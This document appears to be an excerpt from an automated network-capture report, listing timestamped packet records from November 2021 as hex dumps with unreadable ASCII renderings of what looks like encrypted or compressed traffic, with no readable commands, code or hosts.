                                                                                                                                                                                2021-11-11 11:26:50 UTC7330INData Raw: 77 e2 93 38 06 03 20 4a 1c 67 2d 38 3f 7e 88 53 51 93 d0 0e 5b 44 fd 1e 65 1a 3e 72 d8 5c 6a b8 f5 e1 45 b8 88 83 76 19 4f bf 25 8c 2d cd 89 7b 66 10 4d 99 cb 82 bb 85 49 2c d1 22 49 b0 57 22 f7 e0 76 39 bc bd 71 04 92 20 19 30 e1 9f 4f c2 92 b4 7c fa 56 73 1b 3f db b5 53 2b da 09 e9 b7 d4 89 a8 18 13 db 67 3a f9 17 a5 3c 81 b4 30 45 cf 21 98 2d b0 92 e2 16 d0 ba d4 db 5a 82 c2 d0 9e 48 0a 65 44 96 02 38 c4 d1 68 0c 7b ce bb d6 78 1e c1 9f 1c b3 a7 2f 90 c5 80 70 34 73 ba 6b 8f 79 aa ec aa fd e0 26 60 d8 2f 20 43 6d 74 53 11 01 3e 26 0d 78 ba 79 6a b5 91 1b a1 2f d6 a6 7b 6a f2 6c e2 9b 48 24 40 4b cd 92 0f d9 eb 62 06 67 0b 73 f2 e1 5d b4 a0 44 de 93 77 92 be cd ee 64 29 a4 1a 8c 95 1a d2 7c 1d 4f 99 87 ad ef ed 95 92 52 53 1a 89 14 0d 05 63 e9 9f 73 0e
                                                                                                                                                                                Data Ascii: w8 Jg-8?~SQ[De>r\jEvO%-{fMI,"IW"v9q 0O|Vs?S+g:<0E!-ZHeD8h{x/p4sky&`/ CmtS>&xyj/{jlH$@Kbgs]Dwd)|ORScs
                                                                                                                                                                                2021-11-11 11:26:50 UTC7332INData Raw: fd f6 05 8d 54 d5 5d 24 14 03 c6 22 14 46 12 9e 52 4e 88 64 88 50 ee 93 87 9f 12 e2 78 ca e5 84 d2 38 a8 84 7f d6 19 d2 44 e4 c7 60 ba 62 d0 f4 71 fc 87 7a 00 fc 02 12 1f fb 67 c4 29 0b a7 5c bd d4 41 8b 2c 15 ed f8 63 37 01 ad 1d 41 91 e7 80 9d 69 85 08 17 c8 b3 4d f4 aa 33 7e 0c 0b 64 dd c2 85 fc 13 4d 02 5f 91 54 e5 00 07 44 35 61 d2 d7 37 da 40 2a ba bc 59 97 ec 42 bf 48 95 89 b6 82 30 50 a5 34 e5 b0 25 32 29 11 06 d2 d4 eb 0e b4 6e 3e 4f 94 f2 6b 0c ae ec 09 49 ce e6 fa 55 17 8a 0f 30 d0 46 89 12 94 35 da 5b 24 82 85 59 50 e6 ed 37 5a b3 36 a8 98 50 23 72 94 fa 12 aa d0 56 b0 af 0e d5 17 7f c0 97 42 1a 7b 9c 0f 93 2c 4f 1e 3b aa c8 42 81 16 d6 67 fa 72 3f cc 6f 26 77 da 52 05 1c d0 2f 5d 24 9c cc a2 4c cb 06 9d b8 b3 74 db f3 de ff e5 42 fd 34 6b 5e
                                                                                                                                                                                Data Ascii: T]$"FRNdPx8D`bqzg)\A,c7AiM3~dM_TD5a7@*YBH0P4%2)n>OkIU0F5[$YP7Z6P#rVB{,O;Bgr?o&wR/]$LtB4k^
                                                                                                                                                                                2021-11-11 11:26:50 UTC7333INData Raw: 3f 7e da e7 bd fd ac 6d ac 92 3c 22 03 29 ca 12 b7 c4 41 9b 86 40 eb 38 63 52 78 07 fe f2 6d cb 12 85 1a 6f 3d db 53 74 58 7b 6e d4 d2 0c ce 73 61 b4 93 1b cc c4 5c 15 c2 19 2c 32 56 a5 43 76 6e d3 6f fa ea 80 1b 30 ae 6c e1 9c cf ca 16 76 e2 9e d7 9d e8 5c f2 07 c9 73 5d a8 d7 97 0c ba 0e 0d 8e 13 5c d0 39 5a c9 f8 48 f1 c5 79 45 29 2c f9 3a ba 0b 80 15 86 5b ca d0 ed ff 3a e6 60 0b 71 42 94 3d 4d 1e ab fa ad 18 af 6c aa 2f a9 e2 50 27 74 8e 50 a1 5f 51 7a 8f e6 78 7b 1c 8f 83 27 bc 0f 89 e6 c1 5e b8 10 9e 11 fa 4f 72 2e 17 f1 d5 8a 1e da 12 dd 45 81 35 aa 78 19 11 91 79 d8 09 96 76 34 44 68 c1 b2 be 94 3d c1 48 ac 5b 7c b0 13 39 df 74 5d eb 8c 8f 70 9e d0 91 69 7d df 97 9c c0 97 fa 7c dc e9 e7 a6 ca f9 04 d4 61 4c a7 d4 43 39 88 6a 11 0e e2 22 5e 91 06
                                                                                                                                                                                Data Ascii: ?~m<")A@8cRxmo=StX{nsa\,2VCvno0lv\s]\9ZHyE),:[:`qB=Ml/P'tP_Qzx{'^Or.E5xyv4Dh=H[|9t]pi}|aLC9j"^
                                                                                                                                                                                2021-11-11 11:26:50 UTC7334INData Raw: 6c 9d 91 8b 7e 09 22 b3 91 78 7e 50 b3 f2 74 d8 d7 78 d5 3c c1 8b 68 01 e6 92 cf 25 71 64 50 8e a7 64 70 b0 d8 5d 40 a8 33 21 14 6c 82 96 08 67 46 79 dc 54 f9 4d 96 6c 17 92 e8 f0 d6 0c d3 99 46 59 f2 6d fb f2 09 d8 a5 b0 c9 4b c2 11 0e 95 f3 9f 42 ea d2 d6 6b 24 55 8c c8 38 2a 0e 6e c3 2f 0d 49 b3 09 fb 58 d0 79 0f 3f 06 f3 4b 93 f0 1e 80 f2 50 a6 bc 99 d3 2e f7 bd 20 98 f7 0e 23 b7 37 c0 1c ae dd 92 9e 7d 5e 10 67 8f 7a d0 95 bd f1 4f 46 05 e2 55 c0 f4 11 bf 77 f9 b9 0c 19 a4 fa 18 4d 81 92 94 d6 d4 a8 97 02 87 e1 3f f1 9b 31 06 fd 45 ec 73 ee 10 78 43 21 40 fb 91 85 e2 54 ca 12 f5 c9 bd 62 e0 23 b4 a5 83 89 de 2f 29 b4 18 c5 d3 8b 8c ae bc 45 e8 c4 f9 3c 8f 9e 68 a2 9c e0 17 1c ad 3d a8 7b 03 11 00 7e 0c af 42 10 b4 8a c7 40 10 09 7b cc 94 15 1e 58 e4
                                                                                                                                                                                Data Ascii: l~"x~Ptx<h%qdPdp]@3!lgFyTMlFYmKBk$U8*n/IXy?KP. #7}^gzOFUwM?1EsxC!@Tb#/)E<h={~B@{X
                                                                                                                                                                                2021-11-11 11:26:50 UTC7336INData Raw: c7 25 6d 98 1b c0 34 15 e3 59 9c 51 65 8d f9 7f f1 92 36 0d 29 9f ac 80 d9 4f 4b 0e 72 1d 58 63 b0 8b 6b aa fd 4e b0 f3 c1 11 aa 23 d2 cd ed e1 70 8d b8 ec 5c 1f 2f fa fb 38 52 c2 7a 73 45 28 1e f8 c1 1a 7e f4 d7 41 46 7a b5 bb d6 dc 76 7a f8 75 5b 11 9f 3d 3c bf 94 cc a4 e1 9b ca d4 7a fc d3 f7 f6 e0 c3 dd a1 e7 6a d5 7e f4 a3 e0 bb bf 97 8e f8 95 29 83 82 38 e5 70 fb 5a 8e d5 10 a3 92 22 f9 4c 80 cc eb 6b 38 54 e0 06 12 84 7b 59 9c 85 e3 51 c1 15 60 8c 01 d3 6c 7c ce 8c b4 8b 80 f5 4a 53 7f ac f4 c6 d3 5c 65 24 bc be 0d f9 14 be 97 03 be 8c b6 0f 85 5c ea 69 86 1b 90 82 85 3d 62 83 45 6f eb 1b 5e da 2e 98 01 24 8b c5 e8 b0 f2 c5 d0 a8 c1 e1 a3 ca 7e fb 28 43 5c e7 7c d5 8d 34 f1 5d 9b 30 c5 bd 1e 85 95 c2 d8 8d 17 00 e6 00 13 af 4a 71 9d 52 c7 4a bd fd
                                                                                                                                                                                Data Ascii: %m4YQe6)OKrXckN#p\/8RzsE(~AFzvzu[=<zj~)8pZ"Lk8T{YQ`l|JS\e$\i=bEo^.$~(C\|4]0JqRJ
                                                                                                                                                                                2021-11-11 11:26:50 UTC7337INData Raw: 80 c5 a5 1a 30 c0 97 f8 15 14 30 34 00 ec 21 0e 66 17 3b 9d 23 ee 7b fd 80 c5 8b 21 e4 85 7a 2a 9b d4 4d b2 6d ee c8 02 dc db 01 03 73 82 44 32 84 ba 85 57 4a 10 98 f4 44 a3 d5 0d 6b 40 dd 1e 5f e2 1b c8 2f b5 52 6b 9f 18 65 ff 84 e2 1f 98 8e b5 ce 1e b7 01 4b 0b c1 52 1e f6 e6 5d 98 ea 7d 95 b5 4f 60 e3 42 b3 59 6b bd cd da 5b ec 8b 5c 15 96 7b 40 e3 bc 0c 5a a5 34 0c 3f 6e ee ed b6 ec c3 cc c8 fe a7 89 c8 64 bd e7 4f 9d 6d fa d6 5b 75 f8 b8 93 c0 40 48 88 82 9f 39 b8 ab f4 15 a3 6c 47 55 6b 70 91 4d 3b b5 29 d4 8e 8e 10 50 39 a3 e5 8e 0c e1 42 e7 a8 b0 c4 b4 d6 64 37 48 44 22 b0 61 05 8b c6 be 54 b1 c6 eb 65 99 52 52 1a 09 0b 53 75 7a c7 d4 d2 ef 7d 95 c8 9e e0 55 46 2b 0c 8d 88 3b b0 c5 5a 55 60 e7 41 5e fa d2 ab 3b 2d ad 7e fb d2 e7 8e e2 af 24 4a b8
                                                                                                                                                                                Data Ascii: 004!f;#{!z*MmsD2WJDk@_/RkeKR]}O`BYk[\{@Z4?ndOm[u@H9lGUkpM;)P9Bd7HD"aTeRRSuz}UF+;ZU`A^;-~$J
                                                                                                                                                                                2021-11-11 11:26:50 UTC7338INData Raw: 94 57 f4 6b 30 82 be 06 4a b8 04 c7 bc 3f 01 82 d8 2d e6 87 f1 67 00 e9 85 8c e4 55 c9 5b e0 b2 d1 f8 bd c7 4e 6d 0a bd e4 49 4b 94 83 12 1e 83 da 35 7b 22 c1 92 d5 4a ee 30 e5 50 4a 7f d8 08 ac b1 e3 38 e6 75 4e b8 cb d4 92 eb 82 61 4d 53 cc 70 49 76 b4 17 49 07 ee 4e 95 c0 8c 9e 13 fd be 30 96 33 4c 7a d6 97 3b 47 86 47 90 59 17 a3 5d aa fc 72 dd c3 f3 01 e1 0d e0 3f c1 33 01 fb a8 5a 98 0a 12 ab 8d 8a d5 c9 85 a7 3d 89 93 c7 21 8a cd cc 12 53 8f c8 8f 5b 93 8f 06 f7 d4 77 a0 f1 4e eb ca 9e e4 69 85 87 8f bf 17 d0 45 9a 12 ad 35 80 c3 91 7f 24 fd f0 a0 8f 70 a6 f1 59 87 a7 e5 dc 0e 1f 4e 8a 1e 36 2a 08 61 24 58 cc 58 22 9a c1 f3 b1 53 04 03 24 ed 78 e8 50 00 f6 e8 39 ff d2 23 26 fa 2c 5c f4 4f 73 3a c4 72 01 d9 7b bf 1d d3 9b 7a 9d bb d2 90 aa c0 2b 80
                                                                                                                                                                                Data Ascii: Wk0J?-gU[NmIK5{"J0PJ8uNaMSpIvIN03Lz;GGY]r?3Z=!S[wNiE5$pYN6*a$XX"S$xP9#&,\Os:r{z+
                                                                                                                                                                                2021-11-11 11:26:50 UTC7340INData Raw: 9f 3d ce f4 4f 06 10 2d ff b2 8d 05 15 b0 e4 0c 65 6e b4 2b 42 a3 80 5c 76 4e 0c 92 1b e2 72 f3 b1 13 30 d3 6d 09 81 72 19 3a c3 1e a5 84 63 06 2f 97 78 0d 04 0b a2 57 aa ab 04 26 d1 97 f0 67 63 0d 69 a0 70 13 93 d2 4f 6f e8 8b 68 00 6b a0 58 1e 84 77 80 c2 09 83 70 39 f7 12 c2 78 34 94 ad 7c 06 01 7c 00 00 c2 2f 13 84 16 c1 9c 72 62 32 c5 f4 71 4a 0b 78 49 49 b6 06 9b 15 92 0c b6 18 ea e3 ab 43 e1 22 cf 23 d0 03 d9 92 f6 10 66 73 ab d4 d7 56 e4 b0 5c 3a 68 1c cc ab 80 86 51 cb 81 ab 0a 9a 96 0d c1 d4 cd 2f 78 f7 f4 d5 aa 6e 39 b8 13 27 c9 96 6c 88 14 64 ba 71 0b a3 cd f6 3f 92 ab 47 e5 a1 d2 3e 27 91 b9 d0 45 9e d7 df fb 49 cd 31 39 dd a8 70 d1 e0 3f f7 3e 65 08 fa d2 a2 2e 2e 05 2d b1 9d b8 c5 ac 1e 4d cd ab 82 aa c6 9b 1c 4f 41 50 ae 9a 72 ac 10 1d fe
                                                                                                                                                                                Data Ascii: =O-en+B\vNr0mr:c/xW&gcipOohkXwp9x4||/rb2qJxIIC"#fsV\:hQ/xn9'ldq?G>'EI19p?>e..-MOAPr
                                                                                                                                                                                2021-11-11 11:26:50 UTC7341INData Raw: 12 bf 5c fa 07 19 98 55 28 a3 5b 81 0f 0b 1a 4a 3b 38 de 04 3e 07 17 42 30 b7 3d 24 43 db 78 a1 18 08 1b 9a 1b 0b cb b5 c1 b3 80 f3 63 8d 5b 4a e3 40 15 78 0d bb 70 59 c5 ed 77 17 b9 0f 7a 28 32 0f 3c 71 4a 5d 28 d6 ce 03 c5 b1 01 26 78 3c e6 71 74 91 9f 76 04 41 46 75 6e 7d 4d 42 68 42 41 2d a8 b0 2f c6 8d f6 28 94 02 35 e2 86 96 9f bb 56 23 09 8b 49 7a 54 f4 2f 13 1a 84 ef ef f6 06 72 a0 4e f9 24 fb ae a0 19 3e 43 64 21 ce 0a 44 db 0e d7 a0 be 57 55 36 e1 4a 1a d1 32 dd 3d 0d fd 0b 2f b7 69 97 db e2 a0 1a 01 36 cf 4c b0 39 a6 c2 e5 d3 16 7c 53 57 20 b7 5a 88 89 5c 59 c7 91 82 38 0b 2d 6e c4 bd 2e 71 c6 1a 1f 98 03 00 07 c1 c2 cc 94 c3 ab 70 df 48 d3 c4 e6 f9 d5 5e c5 59 31 b2 60 82 21 a9 24 40 df 74 b9 37 56 c7 45 9c 2f 66 3d 79 d1 25 57 54 46 02 47 78
                                                                                                                                                                                Data Ascii: \U([J;8>B0=$Cxc[J@xpYwz(2<qJ](&x<qtvAFun}MBhBA-/(5V#IzT/rN$>Cd!DWU6J2=/i6L9|SW Z\Y8-n.qpH^Y1`!$@t7VE/f=y%WTFGx
                                                                                                                                                                                2021-11-11 11:26:50 UTC7342INData Raw: 8d d5 ed 0c c8 a1 82 b0 18 0f 27 5c 5c d9 34 81 f3 78 f8 27 ad 2f 98 d9 ef 3c 28 04 b4 bb 71 48 59 87 a0 94 0a 4a 14 bb b9 d4 39 07 5e 86 c2 f5 70 c3 18 fe 8d 36 c3 07 c8 bc e9 d9 8b 08 a1 6a 56 56 54 e8 14 0f 30 17 2d 20 80 b7 e9 95 2e bc c1 32 e5 ba 1c d6 bc aa ed ac 80 75 00 c8 82 0e 84 cb 3c e5 13 e8 85 6d ea 36 29 4d d2 f5 e4 e9 a1 88 b2 17 6d 42 7a f2 74 15 9a 1f fe 06 5a e7 c7 58 4e 6b 93 bf dc 8c d3 d2 8c af 82 c4 73 88 cc c6 8a f8 0a 9d f5 03 bb 23 07 ea 76 c2 81 e8 fc e2 fe 3e e6 b1 cd 06 d2 fc 46 48 54 5c 64 52 24 c8 38 8c bf 4f 60 4a 70 19 9b ac 8a 4b 8e 0e 0a 5b b3 85 28 d9 1b a3 7e ea 76 1e d6 bf 70 c7 10 bd 2a e5 30 1b f3 fb bf be b1 94 59 7f 55 1a 49 f6 c4 4a 5d fe 45 da 9f d8 53 56 51 ba 6b 4d 34 1d f4 76 73 3b b7 f8 b4 b8 aa 94 6d fd b9
                                                                                                                                                                                Data Ascii: '\\4x'/<(qHYJ9^p6jVVT0- .2u<m6)MmBztZXNks#v>FHT\dR$8O`JpK[(~vp*0YUIJ]ESVQkM4vs;m
                                                                                                                                                                                2021-11-11 11:26:50 UTC7344INData Raw: d8 52 51 a3 a3 bf f1 ff cd fd 10 18 08 cf 1e 16 09 b4 67 ef b6 fa 22 dc a7 fa de 1f 69 6e 98 69 86 e8 0b a9 cc 22 90 6e 78 cb 6c 3c ae a9 08 cd ad 8a 14 c9 6f 5e 87 66 5c df 85 67 12 1e 7b c9 74 d4 a0 5e 5b 7a 76 d4 3a 86 d3 ec 3b 75 df 7c c6 9e 99 34 c1 c2 3a 28 b1 aa 39 3e ec c7 90 b9 11 88 2f ef e9 8f b1 b9 9f b2 48 19 3e 5e 90 27 17 d6 1d 53 7e 77 d9 c1 aa ed 48 50 2a 75 8a de 96 53 ab 6c f2 b4 dd de a6 d2 82 dd 18 60 f3 8f 01 66 a0 ef ab e5 49 b9 2b 4e 72 bf 47 b5 19 a1 10 ba 04 8c 98 ba 91 9d c8 e9 07 da f2 99 97 09 70 22 43 c2 14 f9 37 d7 9e 8e 10 89 97 ac 36 cd 2d da 94 34 aa 82 7c cc b2 27 41 e3 24 90 c6 69 09 7a 05 cf c3 39 0e de ed ca bb 91 a3 32 91 b7 80 03 13 67 12 64 56 ab b1 73 7f de f4 90 d1 9e e6 c2 d4 c9 1d b6 34 29 9f cc 92 ce c7 3f e3
                                                                                                                                                                                Data Ascii: RQg"ini"nxl<o^f\g{t^[zv:;u|4:(9>/H>^'S~wHP*uSl`fI+NrGp"C76-4|'A$iz92gdVs4)?
                                                                                                                                                                                2021-11-11 11:26:50 UTC7345INData Raw: af ac b4 2d 60 d7 7c c5 b9 0e 74 46 b0 4c b4 99 7c d9 c4 78 b8 7c bd 58 ca 11 6f 55 02 3d 08 47 8e 28 72 eb 55 5a 68 37 af 8a 02 d1 e0 f9 42 20 fa 62 34 d6 19 00 bc d7 c6 fc c9 e2 6b b8 14 79 ca 82 19 26 67 df 28 a5 bc cf d1 d8 8f 7d a5 a3 b4 04 53 f5 d2 03 c0 13 1a 3e ef c0 c0 00 12 79 de f9 d8 88 f7 24 84 c6 b7 ae ff 89 69 b7 5b 82 ca b2 73 b1 1e 64 8e d3 ec 03 c7 21 18 4f d0 76 84 c5 96 f5 35 c4 78 5b 81 04 de 92 d2 9a b6 e8 58 0f 8e 91 62 52 81 7b 3f ba 11 e0 1c fa 67 b5 bf 57 f0 65 b0 04 1f a1 63 56 03 fc 40 c8 29 0b 99 94 4e 85 00 c8 77 f9 89 38 63 c0 91 d1 34 06 a2 e1 e4 04 4f 57 f0 a6 14 f7 20 1d f0 90 34 60 b3 c5 0b ea 49 e4 3b af 62 8d 83 b1 59 cb 26 40 dd 40 50 5f f3 37 58 ef 64 54 4d 1a c5 81 eb 2c d1 98 22 05 27 84 4e f1 23 77 a4 d6 a7 07 c2
                                                                                                                                                                                Data Ascii: -`|tFL|x|XoU=G(rUZh7B b4ky&g(}S>y$i[sd!Ov5x[XbR{?gWecV@)Nw8c4OW 4`I;bY&@@P_7XdTM,"'N#w
                                                                                                                                                                                2021-11-11 11:26:50 UTC7349INData Raw: 16 b7 fe 3c 11 f9 4d 4f a7 d8 c5 24 68 84 0d 66 d2 86 f9 97 6d 55 5d 43 d5 db b0 98 98 61 5b 8e 05 81 bc b2 39 d6 5c bf 8a bf 0d 9b d1 ab 24 48 0a 56 db 6c f5 0f 86 5c 97 1e 5c e0 3f 3b e5 bf 31 cb bf 89 05 69 7a f5 97 4f fa 85 e1 c3 81 a5 e1 87 01 2b 14 22 82 30 8f 94 31 b2 da 45 87 f1 c7 40 cd 6e 13 70 db 21 0c 7c 78 14 f5 95 5b 7d 32 d7 42 fa e8 a9 09 4e 8e 3c 3b 5a aa cd 02 56 2f 48 53 11 28 35 b5 cc b6 d4 eb 7f f6 07 ba 52 e2 f1 d4 7c 54 7b 7d dd ec 29 3b d1 9a c7 f8 90 5a 5e cc 52 b0 ef 70 a6 b1 4f 06 9b 4b 18 03 b3 67 0b a5 eb f8 75 ed 76 03 30 11 9e e6 a5 6f d2 f2 29 d3 c1 db 8b f0 91 f8 68 28 4b a3 1d 74 7b f6 76 2a ae f4 29 10 d3 15 e4 92 8f 9d 5a f1 3f 84 64 5c 77 c3 ed a2 0d c1 c3 15 20 de 27 77 78 b7 76 ab 4a 26 48 25 d3 78 76 d9 7d a1 82 7c
                                                                                                                                                                                Data Ascii: <MO$hfmU]Ca[9\$HVl\\?;1izO+"01E@np!|x[}2BN<;ZV/HS(5R|T{});Z^RpOKguv0o)h(Kt{v*)Z?d\w 'wxvJ&H%xv}|
                                                                                                                                                                                2021-11-11 11:26:50 UTC7353INData Raw: f4 15 00 71 9c f5 b9 10 93 21 2f 8b e5 84 b0 d2 47 e1 a4 e4 a3 11 46 4b fc 76 7c f1 29 ab 82 2c 3a 25 29 4f a4 d4 30 46 42 1b 79 b7 0a 43 d2 7c 26 9e 15 9d a0 da cc f1 13 5e 02 05 dd 40 2e 85 97 55 f8 70 35 4a 2c 8a 7b 2e 62 64 0a 16 2d fc 94 2f 80 7a a2 54 28 8b 1a fa 11 45 db a6 bc 04 09 94 d0 37 72 3d e6 cb c5 cc 5b 49 25 8d eb 36 7f 24 3a 8d 34 06 a5 e9 d8 f4 a4 0f 15 d6 e9 ac c3 07 83 79 88 8b 02 52 84 0a ba 02 c9 65 56 9e 89 d7 1a 2c 68 e5 9e 86 6f a0 23 79 a8 8f a4 c6 4d b5 22 c3 82 e7 d5 23 61 f9 5e d9 6f 82 27 cd 98 b4 af 9e 59 a0 ad fa ee e3 fa 7b 10 be d5 75 98 18 ac 1c 80 b4 23 8f 6c 94 2e bd d3 f6 37 32 66 51 8b 2a 53 c2 85 58 d8 6b 74 47 22 c9 b0 f2 e6 41 1b 66 1d 7f f3 59 5f 5d ac 99 d3 34 21 ae 4d 58 ab d7 3a cf ac 7c 80 a0 23 7e ef e2 55
                                                                                                                                                                                Data Ascii: q!/GFKv|),:%)O0FByC|&^@.Up5J,{.bd-/zT(E7r=[I%6$:4yReV,ho#yM"#a^o'Y{u#l.72fQ*SXktG"AfY_]4!MX:|#~U
                                                                                                                                                                                2021-11-11 11:26:50 UTC7354INData Raw: 7d 78 4f 07 be cd cd 0a 3f 20 f8 81 f8 86 51 7b 40 88 0c d3 34 ad af 8a 1a bb fa 3c bd db 7b 70 d3 4d b7 2d bc 68 6d 91 62 49 dd 53 58 11 74 3b 08 61 b0 79 0d 09 f9 d1 d0 ee ef 49 d7 50 eb cd 1a bc fe c8 b2 8f af 1b b7 bc 35 ba 54 8b 8f c5 bc e2 f0 c8 3c 50 f0 c6 8c 13 48 3d 84 1e 35 7b 83 f7 24 74 44 69 9e a6 a8 5c 09 a2 bf de 98 7f ba 1c 1a 73 5b 83 a0 84 17 bc 33 4d 5a 3f d5 40 10 f6 b9 b2 f7 c0 db c1 13 64 2f 9a 45 16 16 7d 17 51 65 40 a0 dd e7 67 ee 48 69 c6 f4 ed 26 17 8b f9 d5 c1 f4 d2 eb 6d 10 9d fa 3a f6 1b be a6 56 08 3a e9 7e 11 2b 0d f0 4a 83 75 32 22 e4 d5 3d b3 39 59 8e a0 3f 60 b0 0d 70 80 5c f2 0b a4 b6 58 99 09 94 42 bf 82 d3 18 0a d4 14 f8 0a 05 70 c0 4c 86 06 28 6f 18 68 bb 4a 3a cb 62 42 94 d5 68 a1 b0 5a 19 6a 7a 22 1b 90 cf 42 a2 19
                                                                                                                                                                                Data Ascii: }xO? Q{@4<{pM-hmbISXt;ayIP5T<PH=5{$tDi\s[3MZ?@d/E}Qe@gHi&m:V:~+Ju2"=9Y?`p\XBpL(ohJ:bBhZjz"B
                                                                                                                                                                                2021-11-11 11:26:50 UTC7359INData Raw: 4b f7 78 ca 42 a7 96 3b 39 a7 67 a3 33 49 82 65 8c 02 6a 47 a2 d4 7d ad a1 69 7d f4 5e 00 06 cf 7d 47 51 4b 48 3e 7a f1 2b e2 00 f0 58 1c 86 70 d0 b9 4a 63 32 96 98 da 77 53 24 86 af 69 f3 39 68 fa 08 6b cc 58 a1 a1 0d 99 a0 0d 04 13 7b c8 bb b0 bc d2 60 34 b6 62 80 20 52 de e7 ff 27 5a 1a 08 84 84 80 b3 72 89 37 8b 82 c1 21 b8 ed 50 7f f3 4f bd 82 fb b0 48 4f f8 af b9 51 0c c4 71 0a 11 c6 4b ca a8 47 f4 2d 0b 15 75 6d 67 c0 24 52 c5 c0 a6 e9 f8 51 47 b2 98 bc 04 2c 40 b3 78 83 9a f0 dc 23 cc 77 88 b3 5e ab a1 2b 21 87 71 6e b0 81 0c e5 d3 1b f0 17 5b 4e f1 23 9f fa 78 0c d3 54 0b 58 97 94 d8 1b 8a 59 ba 14 4a d7 d4 ed 9e 0b 44 0a 3d 18 15 ae b7 f4 1c bc 58 00 9e 49 6d 80 84 2c 40 48 be 8e c1 e3 7a 7a f4 40 5a 20 f9 9c 9d 56 d8 70 cc 1e 00 ea 04 ec de c4
                                                                                                                                                                                Data Ascii: KxB;9g3IejG}i}^}GQKH>z+XpJc2wS$i9hkX{`4b R'Zr7!POHOQqKG-umg$RQG,@x#w^+!qn[N#xTXYJD=XIm,@Hzz@Z Vp
                                                                                                                                                                                2021-11-11 11:26:50 UTC7363INData Raw: b5 c0 25 f2 43 5e 84 95 bd 27 eb 83 ec a5 cb 76 03 30 0a ef 00 a6 a4 f8 03 fb 88 2a fd 07 99 47 76 ce 87 a3 a6 2f 35 0d d0 28 3b 61 05 39 55 88 9c 50 cd b5 60 1d 96 71 56 28 f3 ab ea a5 3d 4c fa 7d be a2 a4 7f 57 50 f4 a1 bc ea 64 67 26 7e 41 1b 85 de f0 e0 d9 d4 7e f5 62 70 10 f2 47 be 84 78 49 f8 69 08 d3 5b 4b 83 19 7d 92 1c f4 5e 90 42 23 cf 1a 94 08 15 67 17 ff 8b 5a bc d3 a6 05 c7 d0 3f bf 53 9e be 4b 5c 49 7e 8b 8c 19 50 92 a5 7d 9e 13 2e 4e 5a 04 71 11 3a 63 cb 16 98 d4 10 9e e1 ba d6 e4 81 d8 a5 cf 50 a4 84 b5 2f ac b9 e8 f7 7f 3e 6f 59 1a 6e 64 69 c4 64 3b 3e 11 6b 90 cf 14 84 ba 49 a4 a7 f6 81 2b c6 b3 1b 6f dd a1 a6 ee 74 6c 43 9e e2 8d b8 4d dd 79 75 af 7a d1 c6 05 b8 c6 2a b7 68 ba 9e 98 96 35 e4 c7 29 70 9e 82 cd e2 7f 23 51 ba 75 b2 82 f9
                                                                                                                                                                                Data Ascii: %C^'v0*Gv/5(;a9UP`qV(=L}WPdg&~A~bpGxIi[K}^B#gZ?SK\I~P}.NZq:cP/>oYndid;>kI+otlCMyuz*h5)p#Qu
                                                                                                                                                                                2021-11-11 11:26:50 UTC7367INData Raw: b2 e6 b6 6f b6 4b b0 37 be 77 d1 11 b2 3f 89 ed af 2f 3a e5 f3 e3 11 6c ec e6 01 31 aa bf 3c 61 f0 9f 91 58 a6 77 c9 75 c6 f1 f5 54 f2 7e dd 5f c9 2a 21 7e d2 df 70 1e 7a bb 97 6c c0 2b 4d 55 6a 4b c8 fc c8 7d e5 59 f9 27 d9 ec ee 4d c9 39 f3 ff 3c 76 d1 f7 7f e1 fa 0a 05 4f d2 a3 91 6f aa 8f 24 61 ae a2 d0 6d fb 42 85 bf 8d 3f 1c 8d a5 53 3c c1 b2 ca 35 64 fe ee a0 6e bd e2 35 9f 91 0a d1 df 41 48 b9 1e 7d 13 6c 11 f3 1f 08 55 11 9c ac 95 96 0b 6a 64 83 d2 2a 15 8b 86 b8 4e fa 09 ca 35 4e 63 da 0b 8c ea da 0f d6 48 ab 35 9c b8 81 41 87 fa d7 14 aa 54 c2 e2 84 1b 65 4c 32 63 3d 4f 85 1f 24 0f d4 5b 0e 6c d5 0a 15 db 8b ff 35 69 97 01 6b 01 3f 08 dd e5 03 36 a3 75 43 4f 7c 5f 95 0b 59 fc 44 03 5c 09 11 ec 88 45 fb 51 60 99 25 5c bd 5c fb 52 cd 5e 26 66 ee
                                                                                                                                                                                Data Ascii: oK7w?/:l1<aXwuT~_*!~pzl+MUjK}Y'M9<vOo$amB?S<5dn5AH}lUjd*N5NcH5ATeL2c=O$[l5ik?6uCO|_YD\EQ`%\\R^&f
                                                                                                                                                                                2021-11-11 11:26:50 UTC7371INData Raw: 79 f7 08 a6 46 e9 4b aa 29 87 31 b2 ca 91 9b b1 99 98 25 e0 29 e3 d8 f2 1e c0 9b 43 d5 d2 9d c6 1c d9 24 8f 4c e1 12 72 b9 98 f5 74 c3 e4 50 ba 1e 39 42 cb db ac f5 10 21 d5 25 ba 37 03 51 ba 2a 81 cb 83 f6 81 10 d3 5c 81 03 65 ff c1 a8 56 fe 07 e2 46 17 4f 17 e6 0a 0d d9 8a be f6 30 06 0a fd 36 12 57 e6 5c a7 04 d7 e1 5c a3 32 4d cb 6f f8 1d 8e 95 f7 95 3b 73 f2 51 96 cd fd 9a ae dd 55 29 74 9b 7f 65 b7 9b ef d5 9e 9b ee 56 72 2e 71 95 42 33 3f b9 f4 13 7f 35 a7 13 ef 78 10 36 c3 01 62 38 f2 01 87 5f e0 0b 9e a6 3b 01 28 2b e1 01 bb 27 c7 2d 28 2d 3d 9a 8f 6b df f6 84 29 d1 45 a6 4e ef 1a af 6b fa 41 ab ea 1f 85 6c 0b 7f cd b0 0b 51 31 3e 97 c6 db 86 ca 11 30 03 24 37 3b 92 0a 7d 3c 94 37 71 2a a7 37 f5 87 a3 c1 ed b4 aa 2c a3 45 65 37 fa a9 2a c2 b7 87
                                                                                                                                                                                Data Ascii: yFK)1%)C$LrtP9B!%7Q*\eVFO06W\\2Mo;sQU)teVr.qB3?5x6b8_;(+'-(-=k)ENkAlQ1>0$7;}<7q*7,Ee7*
